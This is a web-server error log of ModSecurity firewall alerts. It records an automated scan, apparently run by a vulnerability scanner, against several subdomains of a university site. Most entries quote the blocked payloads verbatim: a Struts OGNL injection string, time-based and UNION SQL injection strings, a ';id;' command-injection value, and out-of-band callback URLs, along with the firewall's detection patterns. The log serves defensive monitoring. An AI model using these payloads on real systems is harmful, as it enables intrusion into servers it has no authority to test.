[Tue Aug 29 11:30:16.349869 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\\\"url\\\\":\\\\"http://cjmn8l5jmimk2adbbnlgzmfrifekbqf84.oast.site\\\\"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5c\\x5c\\x22url\\x5c\\x5c\\x22:\\x5c\\x5c\\x22http://cjmn8l5jmimk2adbbnlgzmfrifekbqf84.oast.site\\x5c\\x5c\\x22}: {\\x5c\\x22url\\x5c\\x22:\\x5c\\x22http://cjmn8l5jmimk2adbbnlgzmfrifekbqf84.oast.site\\x5c\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-json/visualizer/v1/upload-data"] [unique_id "ZO10WMCo-f0AAAPMl90AAAAY"]
[Tue Aug 29 11:30:16.350999 2023] [:error] [pid 966] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{\\\\"url\\\\":\\\\"http://cjmn8l5jmimk2adbbnlgeckgzw8dsog3m.oast.site\\\\"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22url\\x5c\\x22:\\x5c\\x22 found within ARGS_NAMES:{\\x5c\\x5c\\x22url\\x5c\\x5c\\x22:\\x5c\\x5c\\x22http://cjmn8l5jmimk2adbbnlgeckgzw8dsog3m.oast.site\\x5c\\x5c\\x22}: {\\x5c\\x22url\\x5c\\x22:\\x5c\\x22http://cjmn8l5jmimk2adbbnlgeckgzw8dsog3m.oast.site\\x5c\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "informatika.unla.ac.id"] [uri "/wp-json/visualizer/v1/upload-data"] [unique_id "ZO10WMCo-f0AAAPGfrMAAAAV"]
[Tue Aug 29 11:30:16.352585 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=(44660*44784)).(#q)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/integration/saveGangster.action"] [unique_id "ZO10WMCo-f0AAANjpwcAAAAT"]
[Tue Aug 29 11:30:16.353358 2023] [:error] [pid 959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at ARGS_NAMES:{\\\\"url\\\\":\\\\"http://cjmn8l5jmimk2adbbnlg8p9hgikm8y1fu.oast.site\\\\"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22:\\x5c\\x22http://c found within ARGS_NAMES:{\\x5c\\x5c\\x22url\\x5c\\x5c\\x22:\\x5c\\x5c\\x22http://cjmn8l5jmimk2adbbnlg8p9hgikm8y1fu.oast.site\\x5c\\x5c\\x22}: {\\x5c\\x22url\\x5c\\x22:\\x5c\\x22http://cjmn8l5jmimk2adbbnlg8p9hgikm8y1fu.oast.site\\x5c\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/wp-json/visualizer/v1/upload-data"] [unique_id "ZO10WMCo-f0AAAO-1oAAAAAI"]
[Tue Aug 29 11:30:17.386980 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9277=9277 found within ARGS:debit: (CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10WcCo-f0AAAPQkeUAAAAe"]
[Tue Aug 29 11:30:17.392336 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9277=9277 found within ARGS:debit: (CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10WcCo-f0AAAPRNYAAAAAf"]
[Tue Aug 29 11:30:17.395678 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9277=9277 found within ARGS:debit: (CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10WcCo-f0AAAPOhW8AAAAa"]
[Tue Aug 29 11:30:17.403589 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{\\\\"url\\\\":\\\\"http://cjmn8l5jmimk2adbbnlguxjr74osgfp86.oast.site\\\\"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22url\\x5c\\x22:\\x5c\\x22 found within ARGS_NAMES:{\\x5c\\x5c\\x22url\\x5c\\x5c\\x22:\\x5c\\x5c\\x22http://cjmn8l5jmimk2adbbnlguxjr74osgfp86.oast.site\\x5c\\x5c\\x22}: {\\x5c\\x22url\\x5c\\x22:\\x5c\\x22http://cjmn8l5jmimk2adbbnlguxjr74osgfp86.oast.site\\x5c\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/wp-json/visualizer/v1/upload-data"] [unique_id "ZO10WcCo-f0AAAN5YGYAAAAN"]
[Tue Aug 29 11:30:17.415937 2023] [:error] [pid 920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9277=9277 found within ARGS:debit: (CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10WcCo-f0AAAOYZhoAAAAB"]
[Tue Aug 29 11:30:17.615523 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9277=9277 found within ARGS:debit: (CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10WcCo-f0AAAPOhXIAAAAa"]
[Tue Aug 29 11:30:18.332958 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9277=9277 found within ARGS:debit: (CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10WsCo-f0AAAOM4U4AAAAU"]
[Tue Aug 29 11:30:19.550082 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:start_hour. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:start_hour: ;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/nightled.cgi"] [unique_id "ZO10W8Co-f0AAAPPStgAAAAd"]
[Tue Aug 29 11:30:19.583771 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:start_hour. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:start_hour: ;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/nightled.cgi"] [unique_id "ZO10W8Co-f0AAAPRNYwAAAAf"]
[Tue Aug 29 11:30:19.632286 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:start_hour. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:start_hour: ;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cgi-bin/nightled.cgi"] [unique_id "ZO10W8Co-f0AAAPPStwAAAAd"]
[Tue Aug 29 11:30:19.685840 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:start_hour. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:start_hour: ;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/nightled.cgi"] [unique_id "ZO10W8Co-f0AAAPRNZEAAAAf"]
[Tue Aug 29 11:30:19.686822 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:start_hour. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:start_hour: ;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/nightled.cgi"] [unique_id "ZO10W8Co-f0AAAN5YHEAAAAN"]
[Tue Aug 29 11:30:20.320377 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpas_keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')/**/ found within ARGS:wpas_keys: 1')/**/AND/**/(SELECT/**/5202/**/FROM/**/(SELECT(SLEEP(6)))yRVR)/**/AND/**/('dwQZ'/**/LIKE/**/'dwQZ"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wp-autosuggest/autosuggest.php"] [unique_id "ZO10XMCo-f0AAAO873YAAAAF"]
[Tue Aug 29 11:30:20.388852 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpas_keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')/**/ found within ARGS:wpas_keys: 1')/**/AND/**/(SELECT/**/5202/**/FROM/**/(SELECT(SLEEP(6)))yRVR)/**/AND/**/('dwQZ'/**/LIKE/**/'dwQZ"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wp-autosuggest/autosuggest.php"] [unique_id "ZO10XMCo-f0AAAPXAjQAAAAi"]
[Tue Aug 29 11:30:20.425749 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpas_keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')/**/ found within ARGS:wpas_keys: 1')/**/AND/**/(SELECT/**/5202/**/FROM/**/(SELECT(SLEEP(6)))yRVR)/**/AND/**/('dwQZ'/**/LIKE/**/'dwQZ"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wp-autosuggest/autosuggest.php"] [unique_id "ZO10XMCo-f0AAAN5YHUAAAAN"]
[Tue Aug 29 11:30:20.447416 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpas_keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')/**/ found within ARGS:wpas_keys: 1')/**/AND/**/(SELECT/**/5202/**/FROM/**/(SELECT(SLEEP(6)))yRVR)/**/AND/**/('dwQZ'/**/LIKE/**/'dwQZ"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wp-autosuggest/autosuggest.php"] [unique_id "ZO10XMCo-f0AAAPRNZYAAAAf"]
[Tue Aug 29 11:30:20.570927 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpas_keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')/**/ found within ARGS:wpas_keys: 1')/**/AND/**/(SELECT/**/5202/**/FROM/**/(SELECT(SLEEP(6)))yRVR)/**/AND/**/('dwQZ'/**/LIKE/**/'dwQZ"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wp-autosuggest/autosuggest.php"] [unique_id "ZO10XMCo-f0AAAPahukAAAAL"]
[Tue Aug 29 11:30:20.580468 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:start_hour. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:start_hour: ;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/nightled.cgi"] [unique_id "ZO10XMCo-f0AAAPRNZwAAAAf"]
[Tue Aug 29 11:30:21.312540 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/devices.inc.php"] [unique_id "ZO10XcCo-f0AAAO874IAAAAF"]
[Tue Aug 29 11:30:21.415556 2023] [:error] [pid 991] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpas_keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')/**/ found within ARGS:wpas_keys: 1')/**/AND/**/(SELECT/**/5202/**/FROM/**/(SELECT(SLEEP(6)))yRVR)/**/AND/**/('dwQZ'/**/LIKE/**/'dwQZ"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wp-autosuggest/autosuggest.php"] [unique_id "ZO10XcCo-f0AAAPfm60AAAAR"]
[Tue Aug 29 11:30:22.352292 2023] [:error] [pid 904] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/devices.inc.php"] [unique_id "ZO10XsCo-f0AAAOIvTQAAAAM"]
